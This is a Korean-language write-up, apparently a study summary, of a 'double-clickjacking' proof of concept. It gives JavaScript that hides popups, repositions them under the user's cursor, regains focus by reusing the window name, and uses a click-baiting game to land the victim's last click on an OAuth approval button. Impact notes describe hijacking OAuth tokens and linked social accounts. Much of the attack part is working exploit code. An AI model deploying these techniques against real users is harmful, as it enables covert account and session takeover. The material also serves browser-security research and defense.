The Ultimate Double-Clickjacking PoC

요약

주제: 다양한 브라우저 트릭을 결합해 “더블 클릭재킹(Double-Clickjacking)” 공격을 완벽한 PoC로 구현

핵심 아이디어

• 비활성 팝업창 위치 제어 : window.movTo로 눈에 보이지 않는 팝업을 마우스 커서 바로 아래로 옮김

onclick = () => {
  onclick = null;
  w = window.open("/popup.html", "", "width=500,height=300");
  w.onload = () => {
    navbarHeight = w.outerHeight - w.innerHeight;
    button = w.document.querySelector("button").getBoundingClientRect();

    onmousemove = (e) => {
      const x = e.screenX - button.x - button.width / 2;
      const y = e.screenY - button.y - button.height / 2 - navbarHeight;
      w.moveTo(x, y);
      w.resizeTo(500, 300);
    };
  };
};

• Same-name 포커스 회복 : window.open(’’, name) 호출만으로 기존 팝업에 다시 포커스를 부여
• 자동 Pop-under 생성 : 첫 클릭 시 팝업을 띄운 뒤 곧바로 백그라운드로 숨겨 사용자가 눈치 못 채게 함

<!-- index.html -->
<body onclick="x()">
  <h1>Click Here</h1>
  <script>
    function x(){
      let params = `width=300,height=300,left=-1000,top=-1000`;

      open('//example.com', 'test', params);

      location='./goog.html';
    }
  </script>
</body>



<!-- goog.html -->
<!DOCTYPE html>
<html lang="en">
<head>
    <title>PopUnder POC</title>
</head>
<body>
    <h1>PopUnder POC</h1>
    <div id="g_id_onload"
         data-client_id="384756754840-qot2bab06l0kihekcu3h76iri7h75eat.apps.googleusercontent.com"
         data-callback="handleCredentialResponse">
    </div>
    <div class="g_id_signin" data-type="standard"></div>

    <script src="https://accounts.google.com/gsi/client" async defer></script>
    <script>
        function handleCredentialResponse(response) {
            // Handle the signed-in user info here
            console.log("Encoded JWT ID token: " + response.credential);
            // You would typically send this token to your server for verification
        }
    </script>
</body>
</html>

• 반복 클릭 유도 : Flappy Bird 게임 같은 UI로 사용자의 연속 클릭을 유도해 최종 클릭을 승인 버튼에 연결

PoC 플로우

1. 초기 클릭

팝업 생성 + 공격자 페이지로 리다이렉트 → Pop-Under

captcha.contentWindow.checkbox.onclick = () => {
  // 1) off-screen 빈 문서 팝업 생성 (name="popup")
  window.open(URL.createObjectURL(blob), "popup", "width=1,height=1,left=9999,top=9999");
  // 2) 바로 Google 로그인 프롬프트 실행 → 팝업이 뒤로 밀림
  triggerPrompt();
  // 3) blur 발생 시 /game 으로 전환
  captcha.contentWindow.onblur = () => location = "/game";
};

클릭 이벤트가 발생하면 빈 문서 팝업을 생성한다. 이어서 Google 로그인 프롬프트를 실행하여 직전에 생성된 팝업이 뒤로 밀리게 된다. 결국 Pop-Under가 발생하여, 사용자가 눈치 채기 어렵게된다.

해당 글의 경우는 Cloudflare Captcha 페이지를 활용하여 사용자 클릭을 유도한다.

2. 커서 이동 추적

onmousemove 이벤트로 팝업 위치.크기 조정

// 마우스 위치를 전역에 기록
document.addEventListener("mousemove", e => mouse = [e.screenX, e.screenY]);

// 500ms 주기로 버튼 위치와 비교해 팝업 재배치
(async () => {
  while (!done) {
    await sleep(500);
    if (mouseInsideButton()) continue;

    // Same-origin hack: about:blank 로 전환 → origin 확보
    w.location = "about:blank";
    await until(() => { try { return w.origin; } catch{} });

    // 계산된 좌표로 팝업 이동
    const x = mouse[0] - button.x - button.width/2;
    const y = mouse[1] - button.y - button.height/2 - navbarHeight;
    w.moveTo(x, y);
    w.resizeTo(POPUP_W, POPUP_H);

    // 원래 대상 페이지로 복귀
    w.location = TARGET;
    lastMove = Date.now();
  }
})();

moveTo 함수를 통해 주기적으로 팝업 창을 마우스 커서 위치로 이동시킨다. 더 자세하게는 팝업 창 속 버튼의 위치를 계산하여 커서 위치로 이동시킨다.

Cross-Origin 팝업의 경우 DOM에 접근할 수 없기에, .location을 이용해 Same-Origin 으로 이동 → 계산된 좌표로 팝업 이동 → 다시 원래 대상 페이지로 복귀하는 과정을 통해 진행한다.

이는 결과적으로 사용자의 특정 입력이 발생하는 순간, 창이 포커스 되며 커서에 위치한 버튼이 눌리게 되는 결과를 이끈다.

3. 연속 클릭 감지

일정 횟수 클릭 이후 window.open(””, name)으로 포커스 강제 이동

if (level === TARGET_LEVEL) parent.postMessage("trigger", "*");

특정 조건(3단계 통과)을 달성하면 postMessage(”trigger”, “*”)를 보낸다.

window.addEventListener("message", async e => {
  if (e.data === "trigger") {
    // 팝업 포커싱 & 승인 클릭 유도
    w = window.open("", "popup");
    await until(() => w.closed);
    location = "/";
  }
})

window.open(””, “popup”)과 같이 기존 생성한 팝업과 동일한 이름의 창을 열면, 포커스가 회복되는 점을 이용하여, 타겟 창에 포커싱을 한다.

4. 사용자 승인 버튼 클릭

감쪽같이 권한 부여

게임을 통해 유도한 사용자의 마지막 클릭을 팝업 승인 버튼에 연결한다. 이후 팝업을 종료하여 사용자가 눈치 채기 전에 공격을 종료한다.

팝업이 눈 깜짝할 사이에 사라지기에, 사용자는 팝업이 잠깐 떴다는 사실조차 알아차리기 힘들다.

최종 요약

분류 키워드

• Cross-Origin Control Bypass
• Double-Clickjacking
• User Engagement & Stealth

Root Cause	사용자에게 보이는 UI 요소와, 실제 전달되는 이벤트간의 불일치
취약점 종류	Clickjacking
공격 방식	동적 팝업 포커스 하이재킹 (Adaptive Popup Focus Hijacking)

영향

계정.세션 탈취

• OAuth/SSO 토큰을 가로채 사용자의 서비스 접근 권한 탈취
• 피해자가 “승인”을 클릭하는 순간, 공격자는 OAuth 인증 코드를 가로챈다. 이 코드를 이용해 엑세스 토큰을 발급받으면, 피해자의 이메일.캘린더.파일.결제 기능 등 모든 API 호출 권한을 완전 장악한다. 피해자는 나중에 로그나 알림에서 이상 징후를 발견하기 전까지 무단 활동을 전혀 눈치채지 못한다.
• 소셜 로그인 연동 (Link Hijacking)
• 사용자가 “구글 계정 연동” 버튼을 클릭하기만 하면, 투명 iframe이 백그라운드에서 공격자 계정을 피해자 서비스에 연결한다. 이후 피해자는 본인도 모르게 공격자 소유 소셜 계정으로 로그인되며, 개인 정보를 열람.수정, 메시지 전송 등 계정 내 모든 활동이 공격자에게 통제된다.